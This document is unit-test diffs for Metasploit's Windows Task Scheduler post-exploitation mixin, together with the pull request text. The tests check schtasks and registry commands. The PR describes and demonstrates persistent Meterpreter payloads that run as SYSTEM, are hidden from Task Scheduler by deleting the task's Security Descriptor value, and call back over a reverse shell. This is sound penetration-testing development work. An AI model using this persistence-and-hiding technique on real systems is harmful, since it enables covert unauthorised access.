+      allow(subject).to receive(:schtasks_exec)
+      allow(subject).to receive(:delete_reg_key_value)
+    end
+
+    context 'with the default options' do
+      it 'executes the expected command to create a task' do
+        cmd = "schtasks /create /tn \"#{task_name}\" /tr \"#{task_cmd}\" /sc #{task_type} /st 00:00:00 /ru #{run_as} /f"
+        expect(subject).to receive(:schtasks_exec).with(cmd)
+        subject.task_create(task_name, task_cmd)
+      end
+      it 'obfuscates the task' do
+        reg_key = "#{described_class::TASK_REG_KEY}\\#{task_name}"
+        reg_value = described_class::TASK_SD_REG_VALUE
+        expect(subject).to receive(:delete_reg_key_value).with(reg_key, reg_value, {})
+        subject.task_create(task_name, task_cmd)
+      end
+    end
+
+    context 'with specific datastore options' do
+      before :example do
+        datastore.merge!({
+          'ScheduleType' => 'MINUTE',
+          'ScheduleModifier' => 5,
+          'ScheduleRunAs' => 'Admin'
+        })
+      end
+
+      it 'executes the expected command to create a task' do
+        task_mod = datastore['ScheduleModifier']
+        cmd = "schtasks /create /tn \"#{task_name}\" /tr \"#{task_cmd}\" /sc #{task_type} /mo #{task_mod} /st 00:00:00 /ru #{run_as} /f"
+        expect(subject).to receive(:schtasks_exec).with(cmd)
+        subject.task_create(task_name, task_cmd)
+      end
+    end
+
+    context 'with explicit options passed as argument' do
+      let(:opts) do
+        {
+          task_type: 'HOURLY',
+          modifier: 12,
+          runas: 'User1'
+        }
+      end
+      it 'executes the expected command to create a task' do
+        cmd = "schtasks /create /tn \"#{task_name}\" /tr \"#{task_cmd}\" /sc #{opts[:task_type]} /mo #{opts[:modifier]} /st 00:00:00 /ru #{opts[:runas]} /f"
+        expect(subject).to receive(:schtasks_exec).with(cmd)
+        subject.task_create(task_name, task_cmd, opts)
+      end
+    end
+
+    context 'without obfuscation' do
+      context 'with specific datastore option' do
+        before :example do
+          datastore.merge!({ 'ScheduleObfuscateTask' => false })
+        end
+
+        it 'does not obfuscate the task' do
+          expect(subject).to_not receive(:delete_reg_key_value)
+          subject.task_create(task_name, task_cmd)
+        end
+      end
+    end
+  end
+
+  describe '#task_start' do
+    before :example do
+      allow(subject).to receive(:schtasks_exec)
+    end
+
+    it 'executes the expected command to run a task' do
+      cmd = "schtasks /run /tn #{task_name}"
+      expect(subject).to receive(:schtasks_exec).with(cmd)
+      subject.task_start(task_name)
+    end
+  end
+
+  describe '#task_delete' do
+    before :example do
+      allow(subject).to receive(:schtasks_exec)
+      allow(subject).to receive(:add_reg_key_value)
+    end
+
+    context 'with the default options' do
+      it 'executes the expected command to delete a task' do
+        cmd = "schtasks /delete /tn #{task_name} /f"
+        expect(subject).to receive(:schtasks_exec).with(cmd)
+        subject.task_delete(task_name)
+      end
+      it 'desobfuscates the task' do
+        reg_key = "#{described_class::TASK_REG_KEY}\\#{task_name}"
+        reg_value = described_class::TASK_SD_REG_VALUE
+        expect(subject).to receive(:add_reg_key_value).with(reg_key, reg_value, described_class::DEFAULT_SD, 'REG_BINARY', {})
+        subject.task_delete(task_name)
+      end
+    end
+  end
+
+  describe '#task_query' do
+    before :example do
+      allow(subject).to receive(:schtasks_exec)
+    end
+
+    context 'on modern Windows' do
+      it 'executes the expected command to query a task' do
+        cmd = "schtasks /query /tn #{task_name} /v /fo csv /hresult"
+        expect(subject).to receive(:schtasks_exec).with(cmd, with_result: true)
+        subject.task_query(task_name)
+      end
+    end
+
+    context 'on older Windows' do
+      it 'executes the expected command to query a task' do
+        subject.instance_variable_set(:@old_os, true)
+        cmd = "schtasks /query /v /fo csv"
+        expect(subject).to receive(:schtasks_exec).with(cmd, with_result: true)
+        subject.task_query(task_name)
+      end
+    end
+  end
+
+
+  #
+  # Private methods
+  #
+
+  describe '#check_compatibility' do
+    context 'with Windows XP SP2' do
+      before :example do
+        allow(subject).to receive(:sysinfo).and_return( { 'OS' => "Windows XP (5.1 Build 2600, Service Pack 2)." } )
+      end
+      it 'sets `@old_schtasks` and `@old_os` to true' do
+        subject.send(:check_compatibility)
+        expect(subject.instance_variable_get(:@old_schtasks)).to be true
+        expect(subject.instance_variable_get(:@old_os)).to be true
+      end
+    end
+
+    context 'with Windows Server 2003 SP2' do
+      before :example do
+        allow(subject).to receive(:sysinfo).and_return( { 'OS' => "Windows .NET Server (5.2 Build 3790, Service Pack 2)." } )
+      end
+      it 'sets `@old_schtasks` to false and `@old_os` to true' do
+        subject.send(:check_compatibility)
+        expect(subject.instance_variable_get(:@old_schtasks)).to be false
+        expect(subject.instance_variable_get(:@old_os)).to be true
+      end
+    end
+
+    context 'with Windows Server 2016' do
+      before :example do
+        allow(subject).to receive(:sysinfo).and_return( { 'OS' => "Windows 2016+ (10.0 Build 14393)." } )
+      end
+      it 'sets `@old_schtasks` and `@old_os` to false' do
+        subject.send(:check_compatibility)
+        expect(subject.instance_variable_get(:@old_schtasks)).to be false
+        expect(subject.instance_variable_get(:@old_os)).to be false
+      end
+    end
+  end
+
+  describe '#log_and_print' do
+    let(:msg) { double('log message') }
+    before :example do
+      mock_methods = [ :vprint_status, :vprint_good, :vprint_error, :dlog, :ilog, :wlog, :elog ]
+      mock_methods.each { |meth| allow(subject).to receive(meth) }
+    end
+
+    context 'with the default level (:debug)' do
+      it 'prints a status message' do
+        expect(subject).to receive(:vprint_status).with(msg)
+        subject.send(:log_and_print, msg)
+      end
+      it 'logs a debug entry' do
+        expect(subject).to receive(:dlog).with(msg)
+        subject.send(:log_and_print, msg)
+      end
+    end
+
+    context 'with the :status level' do
+      it 'prints a status message' do
+        expect(subject).to receive(:vprint_status).with(msg)
+        subject.send(:log_and_print, msg, level: :status)
+      end
+      it 'logs a info entry' do
+        expect(subject).to receive(:ilog).with(msg)
+        subject.send(:log_and_print, msg, level: :status)
+      end
+    end
+
+    context 'with the :warning level' do
+      it 'prints a warning message' do
+        expect(subject).to receive(:vprint_warning).with(msg)
+        subject.send(:log_and_print, msg, level: :warning)
+      end
+      it 'logs a warning entry' do
+        expect(subject).to receive(:wlog).with(msg)
+        subject.send(:log_and_print, msg, level: :warning)
+      end
+    end
+
+    context 'with the :error level' do
+      it 'prints a error message' do
+        expect(subject).to receive(:vprint_error).with(msg)
+        subject.send(:log_and_print, msg, level: :error)
+      end
+      it 'logs a error entry' do
+        expect(subject).to receive(:elog).with(msg)
+        subject.send(:log_and_print, msg, level: :error)
+      end
+    end
+  end
+
+  describe '#get_schtasks_cmd_string' do
+    context 'with the default options' do
+      it 'returns the expected command string' do
+        cmd_in = %w[/test /flag1 value1]
+        cmd_out = "schtasks #{cmd_in.join(' ')}"
+        expect(subject.send(:get_schtasks_cmd_string, cmd_in)). to eq(cmd_out)
+      end
+    end
+
+    context 'with specific datastore options' do
+      before :example do
+        datastore.merge!({
+          'ScheduleRemoteSystem' => '1.2.3.4',
+          'ScheduleUsername' => 'msfuser',
+          'SchedulePassword' => 'msfpasswd'
+        })
+      end
+      it 'returns the expected command string' do
+        cmd_in = %w[/test /flag1 value1]
+        cmd_out = "schtasks #{cmd_in.join(' ')} /s 1.2.3.4 /u msfuser /p msfpasswd"
+        expect(subject.send(:get_schtasks_cmd_string, cmd_in)). to eq(cmd_out)
+      end
+    end
+
+    context 'with explicit options passed as argument' do
+      let(:opts) do
+        {
+          remote_system: '1.2.3.4',
+          username: 'msfuser',
+          password: 'msfpasswd'
+        }
+      end
+      it 'returns the expected command string' do
+        cmd_in = %w[/test /flag1 value1]
+        cmd_out = "schtasks #{cmd_in.join(' ')} /s 1.2.3.4 /u msfuser /p msfpasswd"
+        expect(subject.send(:get_schtasks_cmd_string, cmd_in, opts)). to eq(cmd_out)
+      end
+    end
+  end
+
+
+  describe '#schtasks_exec' do
+    let(:result) { [ Rex::Text.rand_text_alpha(rand(8)), true ] }
+    let(:cmd) { double('Command') }
+    before :example do
+      allow(subject).to receive(:log_and_print)
+      allow(subject).to receive(:cmd_exec_with_result).and_return(result)
+    end
+
+    context 'without result' do
+      context 'when it succeeds' do
+        it 'returns nil' do
+          expect(subject.send(:schtasks_exec, cmd)).to be nil
+        end
+      end
+      context 'when it fails' do
+        it 'raises an error' do
+          result[1] = false
+          expect { subject.send(:schtasks_exec, cmd) }.to raise_error(described_class::TaskSchedulerError)
+        end
+      end
+    end
+
+    context 'with result' do
+      context 'when it succeeds' do
+        it 'returns the result' do
+          expect(subject.send(:schtasks_exec, cmd, with_result: true)).to eq(result)
+        end
+      end
+      context 'when it fails' do
+        it 'returns the result' do
+          result[1] = false
+          expect(subject.send(:schtasks_exec, cmd, with_result: true)).to eq(result)
+        end
+      end
+    end
+  end
+
+  describe '#get_system_privs' do
+    let(:session_type) { 'meterpreter' }
+    let(:ext) { double('Meterpreter extension') }
+    let(:result) { [true, 'technique'] }
+    before :example do
+      allow(subject).to receive(:log_and_print)
+      allow(subject).to receive(:is_system?).and_return(false)
+      allow(subject).to receive_message_chain('session.type').and_return(session_type)
+      allow(subject).to receive_message_chain('session.ext.priv').and_return(ext)
+      allow(subject).to receive_message_chain('session.priv.getsystem').and_return(result)
+    end
+
+    it 'tries to get SYSTEM privileges' do
+      expect(subject).to receive(:session)
+      subject.send(:get_system_privs)
+    end
+
+    context 'when the session is alreay in SYSTEM user context' do
+      it 'does not try to get SYSTEM privileges' do
+        allow(subject).to receive(:is_system?).and_return(true)
+        expect(subject).to_not receive(:session)
+        subject.send(:get_system_privs)
+      end
+    end
+
+    context 'when the session is not a Meterpreter session' do
+      it 'raises an error' do
+        session_type.replace('shell')
+        expect { subject.send(:get_system_privs) }.to raise_error(described_class::TaskSchedulerSystemPrivsError)
+      end
+    end
+
+    context 'when the Meterpreter session does not support the priv extension' do
+      it 'raises an error' do
+        allow(subject).to receive_message_chain('session.ext.priv').and_return(nil)
+        expect { subject.send(:get_system_privs) }.to raise_error(described_class::TaskSchedulerSystemPrivsError)
+      end
+    end
+
+    context 'when it fails to get SYSTEM privileges' do
+      it 'raises an error' do
+        result[0] = false
+        expect { subject.send(:get_system_privs) }.to raise_error(described_class::TaskSchedulerSystemPrivsError)
+      end
+    end
+  end
+
+  describe '#task_info_field' do
+    let(:task_name) { 'fzuZbSwfXc' }
+    let(:task_info) {
+      info = '"HostName","TaskName","Next Run Time","Status","Logon Mode","Last Run Time","Last Result","Author",'\
+             '"Task To Run","Start In","Comment","Scheduled Task State","Idle Time","Power Management","Run As User",'\
+             '"Delete Task If Not Rescheduled","Stop Task If Runs X Hours and X Mins","Schedule","Schedule Type",'\
+             '"Start Time","Start Date","End Date","Days","Months","Repeat: Every","Repeat: Until: Time",'\
+             '"Repeat: Until: Duration","Repeat: Stop If Still Running"'
+      info << "\r\n"
+      info << '"WINDESK.local","\fzuZbSwfXc","N/A","Ready","Interactive/Background","11/30/1999 12:00:00 AM","267011",'\
+              '"WINDEST\Administrator","reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache'\
+              '\Tree\DGvtFiFtnZQVmtY" /v "SD"","N/A","N/A","Enabled","Disabled","Stop On Battery Mode, No Start On '\
+              'Batteries","SYSTEM","Disabled","72:00:00","Scheduling data is not available in this format.","One Time '\
+              'Only","12:00:00 AM","5/10/2020","N/A","N/A","N/A","Disabled","Disabled","Disabled","Disabled"'
+      info
+    }
+    let(:key) { 'Task To Run' }
+    let(:result) { 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DGvtFiFtnZQVmtY" /v "SD"' }
+
+    it 'returns the value corresponding to the given key' do
+      expect(subject.send(:task_info_field, task_name, task_info, key)).to eq(result)
+    end
+
+    context 'when the task name is not found' do
+      it 'returns nil' do
+        expect(subject.send(:task_info_field, 'NotExisting', task_info, key)).to eq(nil)
+      end
+    end
+
+    context 'when the task info is empty' do
+      it 'returns nil' do
+        expect(subject.send(:task_info_field, task_name, '', key)).to eq(nil)
+      end
+    end
+
+    context 'when the task info only contains a title line' do
+      it 'returns nil' do
+        task_info.replace(task_info.lines[0])
+        expect(subject.send(:task_info_field, task_name, task_info, key)).to eq(nil)
+      end
+    end
+
+    context 'when the key is not found' do
+      it 'returns nil' do
+        expect(subject.send(:task_info_field, task_name, task_info, 'NotExisting')).to eq(nil)
+      end
+    end
+  end
+
+  describe '#task_has_run?' do
+    let(:last_run_time) { '10/22/2022 10:01:30 PM' }
+    before :example do
+      allow(subject).to receive(:task_info_field).and_return(last_run_time)
+    end
+
+    context 'when the task has run' do
+      it 'return true' do
+        expect(subject.send(:task_has_run?, 'taskname', 'task_info')).to be true
+      end
+    end
+
+    context 'when "Last Run Time" is "11/30/1999 12:00:00 AM"' do
+      it 'returns false' do
+        last_run_time.replace('11/30/1999 12:00:00 AM')
+        expect(subject.send(:task_has_run?, 'taskname', 'task_info')).to be false
+      end
+    end
+
+    context 'when "Last Run Time" is "N/A"' do
+      it 'returns false' do
+        last_run_time.replace('N/A')
+        expect(subject.send(:task_has_run?, 'taskname', 'task_info')).to be false
+      end
+    end
+  end
+
+  describe '#task_is_still_running?' do
+    let(:last_result) { described_class::SCHED_S_TASK_RUNNING.to_s }
+    before :example do
+      allow(subject).to receive(:task_info_field).and_return(last_result)
+    end
+
+    context 'when the task is still running' do
+      it 'return true' do
+        expect(subject.send(:task_is_still_running?, 'taskname', 'task_info')).to be true
+      end
+    end
+
+    context 'when the task has returned' do
+      it 'returns false' do
+        last_result.replace('0')
+        expect(subject.send(:task_is_still_running?, 'taskname', 'task_info')).to be false
+      end
+    end
+  end
+
+  describe '#run_one_off_task' do
+    let(:task_name) { Rex::Text.rand_text_alpha(rand(8..15)) }
+    let(:cmd) { double('Command') }
+    let(:opts) { { task_type: 'ONCE', runas: 'SYSTEM', obfuscate: false } }
+    before :example do
+      allow(subject).to receive(:log_and_print)
+      allow(Rex::Text).to receive(:rand_text_alpha).and_return(task_name)
+      allow(subject).to receive(:task_create)
+      allow(subject).to receive(:task_start)
+      allow(subject).to receive(:task_delete)
+    end
+
+    it 'creates, starts and deletes a scheduled task to execute the given command' do
+      expect(subject).to receive(:task_create).with(task_name, cmd, opts)
+      expect(subject).to receive(:task_start).with(task_name)
+      expect(subject).to receive(:task_delete).with(task_name, opts)
+      subject.send(:run_one_off_task, cmd)
+    end
+
+    context 'when checking if it succeeded' do
+      let(:result) { ['info', true] }
+      before :example do
+        allow(subject).to receive(:log_and_print)
+        allow(subject).to receive(:task_query).and_return(result)
+        allow(subject).to receive(:task_has_run?).and_return(true)
+        allow(subject).to receive(:task_is_still_running?).and_return(false)
+        allow(subject).to receive(:task_info_field).and_return('0')
+        allow(subject).to receive(:sleep)
+      end
+
+      it 'queries the task' do
+        expect(subject).to receive(:task_query).with(task_name)
+        subject.send(:run_one_off_task, cmd, check_success: true)
+      end
+
+      context 'when the command succeeded' do
+        it 'returns true' do
+          expect(subject.send(:run_one_off_task, cmd, check_success: true)).to be true
+        end
+      end
+
+      context 'when the command failed' do
+        it 'returns true' do
+          allow(subject).to receive(:task_info_field).and_return('1')
+          expect(subject.send(:run_one_off_task, cmd, check_success: true)).to be false
+        end
+      end
+
+      context 'when the task is still running' do
+        before :example do
+          allow(subject).to receive(:task_is_still_running?).and_return(true)
+        end
+
+        it 'retries to query the task 5 times until it gives up and returns false' do
+          expect(subject).to receive(:task_query).exactly(5).times
+          expect(subject.send(:run_one_off_task, cmd, check_success: true)).to be false
+        end
+
+        it 'waits 1 sec. between each try' do
+          expect(subject).to receive(:sleep).exactly(5).times.with(1)
+          expect(subject.send(:run_one_off_task, cmd, check_success: true)).to be false
+        end
+      end
+    end
+  end
+
+  describe '#reg_key_value_exists?' do
+    let(:reg_key) { 'Registry key' }
+    let(:reg_value) { 'Registry key value' }
+
+    context 'when the task is local' do
+      before :example do
+        allow(subject).to receive(:cmd_exec_with_result).and_return(['', true])
+      end
+
+      it 'executes the expected command' do
+        cmd = "reg query \"#{reg_key}\" /v \"#{reg_value}\" /reg:64"
+        expect(subject).to receive(:cmd_exec_with_result).with(cmd)
+        subject.send(:reg_key_value_exists?, reg_key, reg_value)
+      end
+      it 'returns the result' do
+        expect(subject.send(:reg_key_value_exists?, reg_key, reg_value)).to be true
+      end
+      context 'with old Windows versions' do
+        it 'executes the expected command' do
+          subject.instance_variable_set(:@old_os, true)
+          cmd = "reg query \"#{reg_key}\" /v \"#{reg_value}\""
+          expect(subject).to receive(:cmd_exec_with_result).with(cmd)
+          subject.send(:reg_key_value_exists?, reg_key, reg_value)
+        end
+      end
+    end
+
+    context 'when the task is remote' do
+      let(:cmd) { "reg query \\\"#{reg_key}\\\" /v \\\"#{reg_value}\\\"" }
+      before :example do
+        allow(subject).to receive(:run_one_off_task).and_return(true)
+      end
+
+      context 'when the `ScheduleRemoteSystem` datastore option is set' do
+        before :example do
+          datastore.merge!( { 'ScheduleRemoteSystem' => '1.2.3.4' } )
+        end
+
+        it 'executes the expected command' do
+          expect(subject).to receive(:run_one_off_task).with(cmd, check_success: true)
+          subject.send(:reg_key_value_exists?, reg_key, reg_value)
+        end
+        it 'returns the result' do
+          expect(subject.send(:reg_key_value_exists?, reg_key, reg_value)).to be true
+        end
+      end
+
+      context 'when the `:remote_system` hash option is passed as argument' do
+        it 'executes the expected command' do
+          expect(subject).to receive(:run_one_off_task).with(cmd, check_success: true)
+          subject.send(:reg_key_value_exists?, reg_key, reg_value, {remote_system: '1.2.3.4'})
+        end
+      end
+    end
+  end
+
+  describe 'delete_reg_key_value' do
+    let(:reg_key) { 'Registry key' }
+    let(:reg_value) { 'Registry key value' }
+    before :example do
+      allow(subject).to receive(:log_and_print)
+      allow(subject).to receive(:reg_key_value_exists?).and_return(true)
+      allow(subject).to receive(:get_system_privs)
+    end
+
+    it 'tries to get SYSTEM privileges' do
+      allow(subject).to receive(:cmd_exec_with_result).and_return(['', true])
+      expect(subject).to receive(:get_system_privs)
+      subject.send(:delete_reg_key_value, reg_key, reg_value)
+    end
+
+    context 'when it cannot get SYSTEM privileges' do
+      it 'raises an error' do
+        allow(subject).to receive(:get_system_privs).and_raise(described_class::TaskSchedulerSystemPrivsError)
+        expect { subject.send(:delete_reg_key_value, reg_key, reg_value) }.to raise_error(described_class::TaskSchedulerObfuscationError)
+      end
+    end
+
+    context 'when the key value does not exist' do
+      it 'raises an error' do
+        allow(subject).to receive(:reg_key_value_exists?).and_return(false)
+        expect { subject.send(:delete_reg_key_value, reg_key, reg_value) }.to raise_error(described_class::TaskSchedulerObfuscationError)
+      end
+    end
+
+    context 'when the task is local' do
+      before :example do
+        allow(subject).to receive(:cmd_exec_with_result).and_return(['', true])
+      end
+
+      it 'executes the expected command' do
+        cmd = "reg delete \"#{reg_key}\" /v \"#{reg_value}\" /f /reg:64"
+        expect(subject).to receive(:cmd_exec_with_result).with(cmd, nil, 15, { 'UseThreadToken' => true })
+        subject.send(:delete_reg_key_value, reg_key, reg_value)
+      end
+
+      context 'with old Windows versions' do
+        it 'executes the expected command' do
+          subject.instance_variable_set(:@old_os, true)
+          cmd = "reg delete \"#{reg_key}\" /v \"#{reg_value}\" /f"
+          expect(subject).to receive(:cmd_exec_with_result).with(cmd, nil, 15, { 'UseThreadToken' => true })
+          subject.send(:delete_reg_key_value, reg_key, reg_value)
+        end
+      end
+    end
+
+    context 'when the task is remote' do
+      let(:cmd) { "reg delete \\\"#{reg_key}\\\" /v \\\"#{reg_value}\\\" /f" }
+      before :example do
+        allow(subject).to receive(:run_one_off_task)
+      end
+
+      context 'when the `ScheduleRemoteSystem` datastore option is set' do
+        it 'executes the expected command' do
+          datastore.merge!( { 'ScheduleRemoteSystem' => '1.2.3.4' } )
+          expect(subject).to receive(:run_one_off_task).with(cmd)
+          subject.send(:delete_reg_key_value, reg_key, reg_value)
+        end
+      end
+
+      context 'when the `:remote_system` hash option is passed as argument' do
+        it 'executes the expected command' do
+          expect(subject).to receive(:run_one_off_task).with(cmd)
+          subject.send(:delete_reg_key_value, reg_key, reg_value, {remote_system: '1.2.3.4'})
+        end
+      end
+    end
+  end
+
+  describe 'add_reg_key_ralue' do
+    let(:reg_key) { 'Registry key' }
+    let(:reg_value) { 'Registry key value' }
+    let(:reg_data) { 'Registry key value data' }
+    let(:reg_type) { 'Registry key type' }
+    before :example do
+      allow(subject).to receive(:log_and_print)
+      allow(subject).to receive(:reg_key_value_exists?).and_return(false)
+      allow(subject).to receive(:get_system_privs)
+    end
+
+    it 'tries to get SYSTEM privileges' do
+      allow(subject).to receive(:cmd_exec_with_result).and_return(['', true])
+      expect(subject).to receive(:get_system_privs)
+      subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type)
+    end
+
+    context 'when it cannot get SYSTEM privileges' do
+      it 'raises an error' do
+        allow(subject).to receive(:get_system_privs).and_raise(described_class::TaskSchedulerSystemPrivsError)
+        expect { subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type) }.to raise_error(described_class::TaskSchedulerObfuscationError)
+      end
+    end
+
+    context 'when the key value already exists' do
+      before :example do
+        allow(subject).to receive(:reg_key_value_exists?).and_return(true)
+      end
+
+      it 'does not override it' do
+        expect(subject).to_not receive(:cmd_exec_with_result)
+        subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type)
+      end
+
+      context 'when the :override option is set to true' do
+        it 'overrides it' do
+          expect(subject).to receive(:cmd_exec_with_result).and_return(['', true])
+          subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type, {override: true})
+        end
+      end
+    end
+
+    context 'when the task is local' do
+      before :example do
+        allow(subject).to receive(:cmd_exec_with_result).and_return(['', true])
+      end
+
+      it 'executes the expected command' do
+        cmd = "reg add \"#{reg_key}\" /v \"#{reg_value}\" /t #{reg_type} /d \"#{reg_data}\" /f /reg:64"
+        expect(subject).to receive(:cmd_exec_with_result).with(cmd, nil, 15, { 'UseThreadToken' => true })
+        subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type)
+      end
+
+      context 'with old Windows versions' do
+        it 'executes the expected command' do
+          subject.instance_variable_set(:@old_os, true)
+          cmd = "reg add \"#{reg_key}\" /v \"#{reg_value}\" /t #{reg_type} /d \"#{reg_data}\" /f"
+          expect(subject).to receive(:cmd_exec_with_result).with(cmd, nil, 15, { 'UseThreadToken' => true })
+          subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type)
+        end
+      end
+    end
+
+    context 'when the task is remote' do
+      let(:cmd) { "reg add \\\"#{reg_key}\\\" /v \\\"#{reg_value}\\\" /t #{reg_type} /d \\\"#{reg_data}\\\" /f" }
+      before :example do
+        allow(subject).to receive(:run_one_off_task)
+      end
+
+      context 'when the `ScheduleRemoteSystem` datastore option is set' do
+        it 'executes the expected command' do
+          datastore.merge!( { 'ScheduleRemoteSystem' => '1.2.3.4' } )
+          expect(subject).to receive(:run_one_off_task).with(cmd)
+          subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type)
+        end
+      end
+
+      context 'when the `:remote_system` hash option is passed as argument' do
+        it 'executes the expected command' do
+          expect(subject).to receive(:run_one_off_task).with(cmd)
+          subject.send(:add_reg_key_value, reg_key, reg_value, reg_data, reg_type, {remote_system: '1.2.3.4'})
+        end
+      end
+    end
+  end
+end
+

--- a/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
+++ b/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
@@ -468,7 +468,7 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
   describe '#run_one_off_task' do
     let(:task_name) { Rex::Text.rand_text_alpha(rand(8..15)) }
     let(:cmd) { double('Command') }
-    let(:opts) { { task_type: 'ONCE', runas: 'SYSTEM', obfuscation: false } }
+    let(:opts) { { task_type: 'ONCE', runas: 'SYSTEM', obfuscation: 'NONE' } }
     before :example do
       allow(subject).to receive(:log_and_print)
       allow(Rex::Text).to receive(:rand_text_alpha).and_return(task_name)

--- a/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
+++ b/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
@@ -8,7 +8,7 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
       'ScheduleType' => 'ONSTART',
       'ScheduleModifier' => 1,
       'ScheduleRunAs' => 'SYSTEM',
-      'ScheduleObfuscateTask' => true
+      'ScheduleObfuscationTechnique' => 'SECURITY_DESC'
     }
   end
 
@@ -38,7 +38,7 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
 
     context 'with the default options' do
       it 'executes the expected command to create a task' do
-        cmd = "schtasks /create /tn \"#{task_name}\" /tr \"#{task_cmd}\" /sc #{task_type} /st 00:00:00 /ru #{run_as} /f"
+        cmd = "schtasks /create /tn \"#{task_name}\" /tr \"#{task_cmd}\" /sc #{task_type} /ru #{run_as} /f"
         expect(subject).to receive(:schtasks_exec).with(cmd)
         subject.task_create(task_name, task_cmd)
       end
@@ -85,7 +85,7 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
     context 'without obfuscation' do
       context 'with specific datastore option' do
         before :example do
-          datastore.merge!({ 'ScheduleObfuscateTask' => false })
+          datastore.merge!({ 'ScheduleObfuscationTechnique' => 'NONE' })
         end
 
         it 'does not obfuscate the task' do
@@ -468,7 +468,7 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
   describe '#run_one_off_task' do
     let(:task_name) { Rex::Text.rand_text_alpha(rand(8..15)) }
     let(:cmd) { double('Command') }
-    let(:opts) { { task_type: 'ONCE', runas: 'SYSTEM', obfuscate: false } }
+    let(:opts) { { task_type: 'ONCE', runas: 'SYSTEM', obfuscation: false } }
     before :example do
       allow(subject).to receive(:log_and_print)
       allow(Rex::Text).to receive(:rand_text_alpha).and_return(task_name)


### PR DESCRIPTION
This adds a new mixin to handle Windows Task Scheduler operations for post modules. It allows to create, start and delete tasks on the current system where the session runs, but also on a remote system. This allows the installation of a persistent payload locally or on a remote system the current host has access to. This mixin also uses an obfuscation technique that consists of deleting the Security Descriptor registry value that is associated with the task to hide it from `schtasks /query` command and `Task Scheduler` tool:
```
key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\<task_name>
value: SD
```

This PR also updates `post/windows/manage/persistence_exe`  and `exploit/windows/local/vss_persistence` modules to make use of the mixin.

## Task Scheduler Mixin Options

### ObfuscateTask
Hide the task from `schtasks /query` and Task Scheduler by deleting the associated Security Descriptor registry value. Note that SYSTEM privileges are needed for this. It will try to elevate privileges if the session is not already running under the SYSTEM user.

### ScheduleModifier
Schedule frequency modifier. This defines the amount of minutes/hours/days/weeks/months, depending on the ScheduleType value. When ONIDLE type is used, this represents how many minutes the computer is idle before the task starts. This value is not used with ONCE, ONSTART and ONLOGON types.

### SchedulePassword
Password of the remote user account set in "ScheduleUsername".

### ScheduleRemoteSystem
The remote system to connect to. Use a FQDN to avoid long delays due to automatic DNS resolutions.

### ScheduleRunAs
Execute the task under this user account (default: SYSTEM).

### ScheduleType
Schedule frequency for the new created task. (Accepted: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE)

### ScheduleUsername
Use the permissions of this remote user account to schedule the task remotely (e.g. MYDOMAIN\User1 or `.\Administrator`).

## Verification

### `post/windows/manage/persistence_exe` module (locally)
- [x] Start `msfconsole`
- [x] Get an elevated Meterpreter session
- [x] Create a payload exe file locally and start the corresponding handler (if needed)
- [x] `use post/windows/manage/persistence_exe`
- [x] `run RUN_NOW=false STARTUP=TASK REXEPATH=<payload_local_path> ScheduleType=MINUTE SESSION=<session_nb>`
- [x] **Verify** a session pops up after one minute
- [x] run `schtasks /query /tn <task_name>` on the target
- [x] **Verify** it cannot find the task
- [x] launch `Task Scheduler` on the target
- [x] **Verify** the task is not listed
- [x] `session -i <new_session_nb>`
- [x] `getuid`
- [x] **Verify** the session runs as the SYSTEM user
- [x] `exit`
- [x] **Verify** the session still pops up after it is closed
- [x] `session -k <new_session_nb>`
- [x] `session -i <first_session_nb>`
- [x] `resource <resource file path displayed during execution>`
- [x] **Verify** the cleanup resource file has properly removed the tasks (use `regedit` and `schtasks` on the target) and deleted the payload on the target

<details>
<summary>Example output</summary>

```
msf6 post(windows/manage/persistence_exe) > run RUN_NOW=false STARTUP=TASK REXEPATH=/tmp/payload_meterpreter_reverse_tcp_x64.exe ScheduleType=MINUTE SESSION=1

[*] Running module against WIN10HOST
[*] Reading Payload from file /tmp/payload_meterpreter_reverse_tcp_x64.exe
[+] Persistent Script written to C:\Users\TestUser\AppData\Local\Temp\default.exe
[*] Creating a MINUTE scheduler task
[*] Creating task 'gWgdhZjY' and removing the Security Descriptor registry key value to hide the task
[+] Task created!
[*] Cleanup Meterpreter RC File: /home/msf/.msf4/logs/persistence/WIN10HOST_20220422.2250/WIN10HOST_20220422.2250.rc
[*] Post module execution completed
msf6 post(windows/manage/persistence_exe) >
[*] Sending stage (258630 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.22:49990 ) at 2022-04-22 15:23:02 +0200

msf6 post(windows/manage/persistence_exe) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10HOST
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...


[*] 192.168.1.22 - Meterpreter session 2 closed.  Reason: User exit
[*] 192.168.1.22 - Meterpreter session 2 closed.  Reason: Died
msf6 post(windows/manage/persistence_exe) >
[*] Sending stage (258630 bytes) to 192.168.1.22
[*] Meterpreter session 3 opened (192.168.1.10:4444 -> 192.168.1.22:49998 ) at 2022-04-22 15:32:01 +0200

msf6 post(windows/manage/persistence_exe) > sessions -k 3
[*] Killing the following session(s): 3
[*] Killing session 3
[*] 192.168.1.22 - Meterpreter session 3 closed.
